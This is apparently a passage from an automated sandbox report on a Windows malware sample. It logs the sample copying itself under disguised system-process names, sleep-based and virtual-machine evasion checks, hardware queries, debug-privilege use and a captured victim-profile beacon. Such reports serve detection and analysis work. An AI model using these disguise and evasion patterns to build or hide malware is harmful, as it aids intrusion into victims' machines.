Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Window / User API: threadDelayed 4475	Jump to behavior
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Window / User API: threadDelayed 361
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Window / User API: threadDelayed 364
Source: C:\Recovery\RuntimeBroker.exe	Window / User API: threadDelayed 367
Source: C:\Recovery\RuntimeBroker.exe	Window / User API: threadDelayed 361
Source: C:\Windows\twain_32\SgrmBroker.exe	Window / User API: threadDelayed 366
Source: C:\Windows\twain_32\SgrmBroker.exe	Window / User API: threadDelayed 358
Source: C:\ProgramData\sihost.exe	Window / User API: threadDelayed 368
Source: C:\ProgramData\sihost.exe	Window / User API: threadDelayed 365

Source: C:\Users\user\Desktop\jmBb9uY1B8.exe TID: 4588	Thread sleep count: 1411 > 30	Jump to behavior
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe TID: 4588	Thread sleep count: 816 > 30	Jump to behavior
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe TID: 4996	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe TID: 7528	Thread sleep time: -160000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe TID: 7564	Thread sleep time: -25825441703193356s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe TID: 7564	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe TID: 7564	Thread sleep time: -599829s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe TID: 7564	Thread sleep time: -599792s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe TID: 7564	Thread sleep time: -599654s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe TID: 7564	Thread sleep time: -599531s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe TID: 7564	Thread sleep time: -599402s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe TID: 7564	Thread sleep time: -599292s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe TID: 7564	Thread sleep time: -599171s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe TID: 7564	Thread sleep time: -599042s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe TID: 7564	Thread sleep time: -598911s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe TID: 7564	Thread sleep time: -598790s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe TID: 7564	Thread sleep time: -598688s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe TID: 7564	Thread sleep time: -598576s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe TID: 7564	Thread sleep time: -598476s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe TID: 7564	Thread sleep time: -598343s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe TID: 7564	Thread sleep time: -598177s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe TID: 7564	Thread sleep time: -598065s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe TID: 7564	Thread sleep time: -597943s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe TID: 7564	Thread sleep time: -597810s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe TID: 7564	Thread sleep time: -597695s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe TID: 7564	Thread sleep time: -597560s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe TID: 7564	Thread sleep time: -597212s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe TID: 7564	Thread sleep time: -597081s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe TID: 7564	Thread sleep time: -596976s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe TID: 7564	Thread sleep time: -596857s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe TID: 7564	Thread sleep time: -596756s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe TID: 7564	Thread sleep time: -596655s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe TID: 7564	Thread sleep time: -596554s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe TID: 7564	Thread sleep time: -596453s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe TID: 7564	Thread sleep time: -596352s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe TID: 7564	Thread sleep time: -596236s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe TID: 7564	Thread sleep time: -596120s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe TID: 7564	Thread sleep time: -596005s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe TID: 7564	Thread sleep time: -595904s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe TID: 7564	Thread sleep time: -595788s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe TID: 7564	Thread sleep time: -595666s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe TID: 7564	Thread sleep time: -595563s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe TID: 7564	Thread sleep time: -595450s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe TID: 7564	Thread sleep time: -595349s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe TID: 7564	Thread sleep time: -595249s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe TID: 7564	Thread sleep time: -595149s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe TID: 7564	Thread sleep time: -595033s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe TID: 7564	Thread sleep time: -594933s >= -30000s	Jump to behavior
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe TID: 7916	Thread sleep count: 361 > 30
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe TID: 7848	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe TID: 8140	Thread sleep count: 364 > 30
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe TID: 7904	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\RuntimeBroker.exe TID: 7496	Thread sleep count: 367 > 30
Source: C:\Recovery\RuntimeBroker.exe TID: 7320	Thread sleep count: 361 > 30
Source: C:\Recovery\RuntimeBroker.exe TID: 7976	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\twain_32\SgrmBroker.exe TID: 7492	Thread sleep count: 366 > 30
Source: C:\Windows\twain_32\SgrmBroker.exe TID: 7236	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\twain_32\SgrmBroker.exe TID: 7396	Thread sleep count: 358 > 30
Source: C:\Windows\twain_32\SgrmBroker.exe TID: 7260	Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\sihost.exe TID: 7424	Thread sleep count: 368 > 30
Source: C:\ProgramData\sihost.exe TID: 7264	Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\sihost.exe TID: 7480	Thread sleep count: 365 > 30
Source: C:\ProgramData\sihost.exe TID: 8100	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem

Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\RuntimeBroker.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\RuntimeBroker.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\twain_32\SgrmBroker.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\twain_32\SgrmBroker.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\ProgramData\sihost.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\ProgramData\sihost.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 599829	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 599792	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 599654	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 599531	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 599402	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 599292	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 599171	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 599042	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 598911	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 598790	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 598688	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 598576	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 598476	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 598343	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 598177	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 598065	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 597943	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 597810	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 597695	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 597560	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 597212	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 597081	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 596976	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 596857	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 596756	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 596655	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 596554	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 596453	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 596352	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 596236	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 596120	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 596005	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 595904	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 595788	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 595666	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 595563	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 595450	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 595349	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 595249	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 595149	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 595033	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 594933	Jump to behavior
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\RuntimeBroker.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\twain_32\SgrmBroker.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\twain_32\SgrmBroker.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\sihost.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\sihost.exe	Thread delayed: delay time: 922337203685477

Source: MwDxnowBVCiAiIllnkPs.exe, 0000001F.00000002.4145128324.0000000002C91000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $Hyper-V Hypervisor Logical Processor
Source: MwDxnowBVCiAiIllnkPs.exe, 0000001F.00000002.4186243698.000000001CB5A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \Device\HarddiskVolume1\??\Volume{ad6cc5d8-f1a9-4873-be33-91b2f05e9306}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: MwDxnowBVCiAiIllnkPs.exe, 0000001F.00000002.4187247370.000000001CC9A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VHyper-V Dynamic Memory Integration Service>
Source: MwDxnowBVCiAiIllnkPs.exe, 0000001F.00000002.4184969594.000000001BD33000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Dynamic Memory Integration Service
Source: MwDxnowBVCiAiIllnkPs.exe, 0000001F.00000002.4187247370.000000001CC9A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: X2Hyper-V VM Vid Partition
Source: MwDxnowBVCiAiIllnkPs.exe, 0000001F.00000002.4145128324.0000000002C91000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: !Hyper-V Virtual Machine Bus Pipes
Source: MwDxnowBVCiAiIllnkPs.exe, 0000001F.00000002.4187247370.000000001CC9A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: JHyper-V Hypervisor Logical Processor
Source: MwDxnowBVCiAiIllnkPs.exe, 0000001F.00000002.4187247370.000000001CC9A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: THyper-V Hypervisor Root Virtual ProcessorB
Source: MwDxnowBVCiAiIllnkPs.exe, 0000001F.00000002.4189543945.000000001DD45000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
Source: MwDxnowBVCiAiIllnkPs.exe, 0000001F.00000002.4145128324.0000000002C91000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: *Hyper-V Dynamic Memory Integration Service
Source: MwDxnowBVCiAiIllnkPs.exe, 0000001F.00000002.4187247370.000000001CC9A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: &Hyper-V Hypervisorq
Source: MwDxnowBVCiAiIllnkPs.exe, 0000001F.00000002.4186243698.000000001CB22000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V ydheopouqcgrtcy BusD
Source: jmBb9uY1B8.exe, 00000000.00000002.1764722307.000000001C005000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: jmBb9uY1B8.exe, 00000000.00000002.1766762454.000000001C287000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\04.
Source: MwDxnowBVCiAiIllnkPs.exe, 0000001F.00000002.4145128324.0000000002C91000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor
Source: MwDxnowBVCiAiIllnkPs.exe, 0000001F.00000002.4145128324.0000000002C91000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: !Hyper-V Hypervisor Root Partition
Source: MwDxnowBVCiAiIllnkPs.exe, 0000001F.00000002.4187247370.000000001CC9A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sWDHyper-V Hypervisor Root PartitionZ
Source: MwDxnowBVCiAiIllnkPs.exe, 0000001F.00000002.4145128324.0000000002C91000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: )Hyper-V Hypervisor Root Virtual Processor
Source: MwDxnowBVCiAiIllnkPs.exe, 0000001F.00000002.4145128324.0000000002C91000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V VM Vid Partition
Source: jmBb9uY1B8.exe, 00000000.00000002.1766762454.000000001C287000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}V4L
Source: MwDxnowBVCiAiIllnkPs.exe, 0000001F.00000002.4184969594.000000001BCF7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: MwDxnowBVCiAiIllnkPs.exe, 0000001F.00000002.4183776188.000000001BC70000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V ydheopouqcgrtcy Bus Pipes
Source: MwDxnowBVCiAiIllnkPs.exe, 0000001F.00000002.4187247370.000000001CC9A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AlDHyper-V Virtual Machine Bus Pipesl

Source: C:\Users\user\Desktop\jmBb9uY1B8.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Process token adjusted: Debug
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Process token adjusted: Debug
Source: C:\Recovery\RuntimeBroker.exe	Process token adjusted: Debug
Source: C:\Recovery\RuntimeBroker.exe	Process token adjusted: Debug
Source: C:\Windows\twain_32\SgrmBroker.exe	Process token adjusted: Debug
Source: C:\Windows\twain_32\SgrmBroker.exe	Process token adjusted: Debug
Source: C:\ProgramData\sihost.exe	Process token adjusted: Debug
Source: C:\ProgramData\sihost.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\jmBb9uY1B8.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\jmBb9uY1B8.exe

Process created: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe "C:\Program Files (x86)\internet explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe"

Jump to behavior

Source: MwDxnowBVCiAiIllnkPs.exe, 0000001F.00000002.4145128324.0000000002E07000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: MwDxnowBVCiAiIllnkPs.exe, 0000001F.00000002.4145128324.0000000002E07000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"932923","UserName":"user","IpInfo":{"ip":"8.46.123.189","city":"New York","region":"New York","country":"US","loc":"40.7123,-74.0068","org":"Not specified - United States","postal":"000000","timezone":"America/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"VPVTT (1 GB)","CPUName":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5,"extData":{"be18a75b229d22aba86f648c1afed0deeba7c64b":"0","878f8167152e313f64df8bc19d70635c1ecbe7b4":"?","35865e6faa04f1c9d8584f63fb034d9164661450":"100%","6fbb9a4a0ec7561008e25ecb591e1aab16b0f86d":"0%","0f1270403cf60333874e4414912776ad12b96109":"30%","3dfeababad7a87d8641bdbe593c635751e84776f":"17:57:53"}}aapm

Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Queries volume information: C:\Users\user\Desktop\jmBb9uY1B8.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Queries volume information: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Queries volume information: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe VolumeInformation
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Queries volume information: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe VolumeInformation
Source: C:\Recovery\RuntimeBroker.exe	Queries volume information: C:\Recovery\RuntimeBroker.exe VolumeInformation
Source: C:\Recovery\RuntimeBroker.exe	Queries volume information: C:\Recovery\RuntimeBroker.exe VolumeInformation
Source: C:\Windows\twain_32\SgrmBroker.exe	Queries volume information: C:\Windows\twain_32\SgrmBroker.exe VolumeInformation
Source: C:\Windows\twain_32\SgrmBroker.exe	Queries volume information: C:\Windows\twain_32\SgrmBroker.exe VolumeInformation
Source: C:\ProgramData\sihost.exe	Queries volume information: C:\ProgramData\sihost.exe VolumeInformation
Source: C:\ProgramData\sihost.exe	Queries volume information: C:\ProgramData\sihost.exe VolumeInformation

Source: C:\Users\user\Desktop\jmBb9uY1B8.exe

